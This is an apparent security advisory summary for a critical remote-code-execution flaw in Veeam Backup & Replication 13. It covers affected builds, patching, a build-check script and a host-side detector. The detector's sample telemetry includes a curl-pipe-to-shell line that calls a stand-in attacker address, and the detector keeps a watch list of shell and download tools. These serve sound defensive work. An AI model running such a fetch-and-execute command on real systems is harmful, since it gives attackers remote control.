Full Report
Veeam has released security updates to address multiple flaws in its Backup & Replication software, including a "critical" issue that could result in remote code execution (RCE). The vulnerability, tracked as CVE-2025-59470, carries a CVSS score of 9.0. "This vulnerability allows a Backup or Tape Operator to perform remote code execution (RCE) as the postgres user by sending a malicious
Analysis Summary
# Vulnerability: Critical RCE in Veeam Backup & Replication via Operator Roles
## CVE Details
- CVE ID: CVE-2025-59470
- CVSS Score: 9.0 (Critical)
- CWE: Not stated in the source. The attack shape (crafted **interval** or **order** parameter values leading to code execution as the postgres service account) points to an input-validation failure on the server side, but the vendor has not published a CWE classification.
## Affected Systems
- Products: Veeam Backup & Replication
- Versions: 13.0.1.180 and all earlier version 13 builds.
- Configurations: Exploitation is possible by a user holding the **Backup Operator** or **Tape Operator** role.
## Vulnerability Description
An authenticated user holding the Backup Operator or Tape Operator role, neither of which is meant to grant operating-system level access to the backup server, can achieve remote code execution by submitting a crafted **interval** or **order** parameter. The injected code runs with the privileges of the **postgres** user, the service account that owns the Backup & Replication configuration database.
*(Note: the same advisory covers three further flaws in the same builds: CVE-2025-55125 (RCE as root via a backup configuration file, Operator roles, CVSS 7.2), CVE-2025-59468 (RCE as postgres by a Backup Administrator via a password parameter, CVSS 6.7) and CVE-2025-59469 (file write as root, Operator roles, CVSS 7.2). This summary focuses on the critical CVE-2025-59470.)*
## Exploitation
- Status: The source does not report in-the-wild exploitation or a public proof of concept.
- Prerequisites: Valid credentials for an account assigned the Backup Operator or Tape Operator role. These are delegation roles routinely handed to helpdesk or junior backup staff, so the effective bar is lower than "authenticated" suggests. The source does not publish the CVSS vector string, so attack complexity is not stated.
- Attack Vector: Likely network. Operator roles are exercised through the management console and API, so any host that can reach the backup server's management interfaces can attempt this.
## Impact
- Confidentiality: High (RCE as postgres user likely exposes sensitive backup data or configuration).
- Integrity: High (Ability to execute arbitrary code).
- Availability: High (RCE could lead to service disruption).
## Remediation
### Patches
- Apply the security update to **Veeam Backup & Replication version 13.0.1.1071** or newer.
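A quick way to check a reported build against the advisory's boundaries, as an added example (not Veeam's own tooling). It encodes only the two numbers the page gives, 13.0.1.180 as the last affected build and 13.0.1.1071 as the first fixed one; the build strings it runs against are constructed, and any major version other than 13 is reported as outside the advisory rather than guessed at. The point worth seeing is that dotted build numbers must be compared as integer tuples: as strings, `13.0.1.1071` sorts before `13.0.1.180`, so a naive comparison would report a patched server as vulnerable.

```python
"""Assess a Veeam Backup & Replication 13 build against the KB4792 boundaries.

Added example, not Veeam code. Only the two build numbers the advisory states
are encoded here; everything else is derived from them.
"""

LAST_AFFECTED_BUILD = "13.0.1.180"   # "and all earlier version 13 builds"
FIRST_FIXED_BUILD = "13.0.1.1071"    # "or newer"


def parse_build(version: str) -> tuple:
    """Turn '13.0.1.1071' into (13, 0, 1, 1071).

    Integer tuples compare component by component. Comparing the raw strings
    would be wrong: '13.0.1.1071' < '13.0.1.180' lexicographically, because
    '0' < '8' at the first differing character.
    """
    parts = version.strip().split(".")
    if not parts or not all(p.isdigit() for p in parts):
        raise ValueError(f"not a dotted numeric build string: {version!r}")
    return tuple(int(p) for p in parts)


def assess(version: str) -> str:
    """Classify a build as vulnerable, patched, or one of two 'not sure' answers."""
    build = parse_build(version)
    if build[0] != 13:
        # The advisory text on this page only speaks about version 13 builds.
        return "not covered by this advisory"
    if build >= parse_build(FIRST_FIXED_BUILD):
        return "patched"
    if build <= parse_build(LAST_AFFECTED_BUILD):
        return "vulnerable"
    # Newer than the last affected build but older than the fix: an interim
    # build the advisory does not name. Do not assume either way.
    return "between last affected and first fixed build; confirm with vendor"


if __name__ == "__main__":
    # Constructed sample build strings for illustration.
    for v in ("13.0.0.10", "13.0.1.180", "13.0.1.500", "13.0.1.1071", "13.1.0.10", "12.3.2.3617"):
        print(f"{v:>12}  {assess(v)}")
```

Feed it the build number shown in the console's About dialog or reported by your inventory tooling; the "confirm with vendor" branch exists so that an unexpected interim build is flagged for a human rather than silently marked either way.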
### Workarounds
- The vendor points customers to Veeam's **Security Guidelines** to reduce exposure; no vulnerability-specific mitigation is given beyond applying the patch. Until the update is installed, the attack surface can be shrunk by trimming the set of accounts holding the Backup Operator and Tape Operator roles and by restricting network reachability of the management console and API to administrative hosts.
## Detection
- The source provides no signatures. Network-side detection would have to key on authenticated Backup or Tape Operator requests whose interval or order parameters carry values that are not plain scheduling data (quoting, shell metacharacters, unusually long strings); that requires visibility into the management protocol and is likely to be noisy.
- Host-side, the stronger signal is the **postgres** service account doing anything other than running PostgreSQL: the database server has no legitimate reason to spawn shells, interpreters or download tools. Alert on child processes of the postgres user outside that expected set, and review who currently holds the operator roles.
- Because the same advisory includes root-level flaws (CVE-2025-55125, CVE-2025-59469), also check for unexpected files written or processes started as root by the backup service if an intrusion is suspected.
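The host-side check described above, as an added example (not from the Veeam advisory and not Veeam tooling): it runs over process-creation events and flags the postgres account spawning anything outside the small set of binaries a database server legitimately runs. The JSON-lines event format (fields ts, user, parent_image, image, cmdline), the allow and high-signal lists and the sample events are all constructed for this example; map the field names to whatever your auditd, Sysmon for Linux or EDR export actually produces, and extend the allowlist with anything your deployment legitimately calls from archive_command or scheduled database jobs.

```python
"""Flag the postgres service account executing anything other than PostgreSQL.

Added example, not Veeam code. The advisory says a successful attack runs code
as the postgres user, so this looks for process-creation events in which that
account spawned a binary a database server has no business running.

Event format (constructed for this example): one JSON object per line with
ts, user, parent_image, image and cmdline. Adapt to your telemetry source.
"""
import json
import os
from typing import Optional

# Binaries the PostgreSQL server is expected to run under its own account.
# Add your own archive_command / scheduled-job helpers here, or they will
# show up as hits.
EXPECTED_POSTGRES_CHILDREN = {"postgres", "postmaster", "pg_ctl"}

# Shells, interpreters and download tools: high-signal when spawned as postgres.
HIGH_SIGNAL_CHILDREN = {"sh", "bash", "dash", "zsh", "python3", "perl",
                        "curl", "wget", "nc", "ncat"}


def classify(event: dict) -> Optional[str]:
    """Return None for a benign event, otherwise a short reason string."""
    if event.get("user") != "postgres":
        return None
    child = os.path.basename(event.get("image", ""))
    parent = os.path.basename(event.get("parent_image", ""))
    if child in EXPECTED_POSTGRES_CHILDREN:
        return None
    if child in HIGH_SIGNAL_CHILDREN:
        return f"postgres spawned {child} (parent {parent}) - investigate"
    return f"postgres spawned unexpected binary {child} (parent {parent})"


def scan(lines) -> list:
    """Run classify() over JSON lines. Malformed lines are skipped, not fatal."""
    hits = []
    for line in lines:
        line = line.strip()
        if not line:
            continue
        try:
            event = json.loads(line)
        except json.JSONDecodeError:
            continue
        reason = classify(event)
        if reason:
            hits.append({"ts": event.get("ts"), "reason": reason,
                         "cmdline": event.get("cmdline", "")})
    return hits


# Constructed sample telemetry (not real events). 198.51.100.0/24 is a
# documentation range, used here as a stand-in for an attacker host.
SAMPLE_EVENTS = [
    '{"ts":"2026-01-08T10:15:02Z","user":"postgres","parent_image":"/usr/bin/postgres","image":"/usr/bin/postgres","cmdline":"postgres: checkpointer"}',
    '{"ts":"2026-01-08T10:15:40Z","user":"root","parent_image":"/usr/sbin/cron","image":"/bin/sh","cmdline":"/bin/sh -c /usr/local/bin/rotate-logs"}',
    '{"ts":"2026-01-08T10:16:11Z","user":"postgres","parent_image":"/usr/bin/postgres","image":"/bin/sh","cmdline":"sh -c curl -s http://198.51.100.7/x | sh"}',
    'this line is not json and must not abort the scan',
    '{"ts":"2026-01-08T10:16:12Z","user":"postgres","parent_image":"/bin/sh","image":"/usr/bin/python3","cmdline":"python3 /tmp/shell.py"}',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_EVENTS):
        print(f'{hit["ts"]}  {hit["reason"]}\n    {hit["cmdline"]}')
```

Run against the constructed sample, the cron-driven shell as root is ignored (wrong account), the checkpointer is ignored (expected binary), and the two postgres-parented shell and interpreter launches are reported; the malformed line is skipped so one bad record cannot blind the scan.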
## References
- Vendor Advisory: hxxps://www.veeam.com/kb4792
- Affected Product Document: hxxps://helpcenter.veeam.com/docs/vbr/userguide/configure_roles.html?ver=13
- Security Guidelines: hxxps://helpcenter.veeam.com/docs/vbr/userguide/security_guidelines.html?ver=13